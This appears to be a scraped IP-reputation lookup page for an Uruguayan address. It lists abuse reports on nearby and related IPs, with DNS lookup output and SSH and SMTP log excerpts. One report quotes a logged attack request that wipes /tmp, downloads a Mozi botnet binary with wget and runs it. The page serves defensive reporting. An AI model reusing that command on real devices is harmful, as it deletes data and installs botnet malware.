Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Uruguay

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
IP Type Details Datetime
190.133.161.209 attackbots
Automatic report - Port Scan Attack
2020-07-27 23:58:45
190.133.161.247 attackspam
Port probing on unauthorized port 445
2020-06-05 07:00:12
190.133.163.237 attackspam
Tried sshing with brute force.
2020-05-08 06:14:39
190.133.160.198 attackspambots
Autoban   190.133.160.198 AUTH/CONNECT
2019-07-22 07:53:04
190.133.161.3 attack
2019-07-04 22:50:55 unexpected disconnection while reading SMTP command from r190-133-161-3.dialup.adsl.anteldata.net.uy [190.133.161.3]:8410 I=[10.100.18.21]:25 (error: Connection reset by peer)
2019-07-04 22:51:24 unexpected disconnection while reading SMTP command from r190-133-161-3.dialup.adsl.anteldata.net.uy [190.133.161.3]:54803 I=[10.100.18.21]:25 (error: Connection reset by peer)
2019-07-05 00:21:34 unexpected disconnection while reading SMTP command from r190-133-161-3.dialup.adsl.anteldata.net.uy [190.133.161.3]:24308 I=[10.100.18.21]:25 (error: Connection reset by peer)


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=190.133.161.3
2019-07-05 14:10:52
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 190.133.16.21
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 30365
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;190.133.16.21.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025021600 1800 900 604800 86400

;; Query time: 9 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Feb 16 15:17:19 CST 2025
;; MSG SIZE  rcvd: 106
Host info
21.16.133.190.in-addr.arpa domain name pointer r190-133-16-21.dialup.adsl.anteldata.net.uy.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
21.16.133.190.in-addr.arpa	name = r190-133-16-21.dialup.adsl.anteldata.net.uy.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
197.53.52.92 attackbotsspam
Lines containing failures of 197.53.52.92
2020-06-08 x@x


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=197.53.52.92
2020-06-08 20:22:05
91.234.62.28 attackspam
SS5,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-06-08 20:36:15
175.123.253.220 attackbots
Brute-force attempt banned
2020-06-08 20:26:45
49.249.229.14 attackbots
Lines containing failures of 49.249.229.14
Jun  8 08:32:57 kopano sshd[3341]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.249.229.14  user=r.r
Jun  8 08:32:59 kopano sshd[3341]: Failed password for r.r from 49.249.229.14 port 35364 ssh2
Jun  8 08:32:59 kopano sshd[3341]: Received disconnect from 49.249.229.14 port 35364:11: Bye Bye [preauth]
Jun  8 08:32:59 kopano sshd[3341]: Disconnected from authenticating user r.r 49.249.229.14 port 35364 [preauth]
Jun  8 11:44:12 kopano sshd[12666]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.249.229.14  user=r.r
Jun  8 11:44:15 kopano sshd[12666]: Failed password for r.r from 49.249.229.14 port 56402 ssh2
Jun  8 11:44:15 kopano sshd[12666]: Received disconnect from 49.249.229.14 port 56402:11: Bye Bye [preauth]
Jun  8 11:44:15 kopano sshd[12666]: Disconnected from authenticating user r.r 49.249.229.14 port 56402 [preauth]
Jun  8 12:04:02 ko........
------------------------------
2020-06-08 20:30:59
46.101.57.196 attack
Automatic report - XMLRPC Attack
2020-06-08 19:58:31
68.183.183.21 attack
Jun  8 12:58:20 PorscheCustomer sshd[19955]: Failed password for root from 68.183.183.21 port 39648 ssh2
Jun  8 13:02:05 PorscheCustomer sshd[20062]: Failed password for root from 68.183.183.21 port 40498 ssh2
...
2020-06-08 20:04:56
89.25.253.186 attack
Unauthorized connection attempt from IP address 89.25.253.186 on Port 445(SMB)
2020-06-08 19:59:14
36.7.82.194 attack
firewall-block, port(s): 1433/tcp
2020-06-08 20:21:33
45.162.145.104 attack
Unauthorized connection attempt from IP address 45.162.145.104 on Port 445(SMB)
2020-06-08 20:11:10
115.79.219.155 attack
1591618189 - 06/08/2020 14:09:49 Host: 115.79.219.155/115.79.219.155 Port: 445 TCP Blocked
2020-06-08 20:30:02
173.212.215.43 attackspambots
20 attempts against mh-misbehave-ban on sea
2020-06-08 20:18:27
50.195.136.210 attack
Jun  8 13:13:03 pornomens sshd\[5753\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=50.195.136.210  user=root
Jun  8 13:13:05 pornomens sshd\[5753\]: Failed password for root from 50.195.136.210 port 37395 ssh2
Jun  8 14:09:49 pornomens sshd\[6442\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=50.195.136.210  user=root
...
2020-06-08 20:28:30
181.48.120.219 attack
Jun  8 08:21:49 NPSTNNYC01T sshd[17300]: Failed password for root from 181.48.120.219 port 50852 ssh2
Jun  8 08:25:53 NPSTNNYC01T sshd[17582]: Failed password for root from 181.48.120.219 port 42696 ssh2
...
2020-06-08 20:31:24
46.101.224.184 attackbots
Brute-force attempt banned
2020-06-08 20:27:26
80.82.65.74 attackspam
Unauthorized connection attempt detected from IP address 80.82.65.74 to port 8118
2020-06-08 20:37:21

Recently Reported IPs

14.219.243.127 76.28.153.222 253.225.222.14 166.113.237.73
172.251.202.221 82.167.205.53 7.165.47.92 209.240.209.34
228.229.201.53 74.29.141.164 213.97.135.31 107.173.41.222
104.167.245.125 65.149.15.170 12.230.125.77 107.9.160.55
251.80.215.23 65.16.163.172 108.160.9.193 83.221.75.136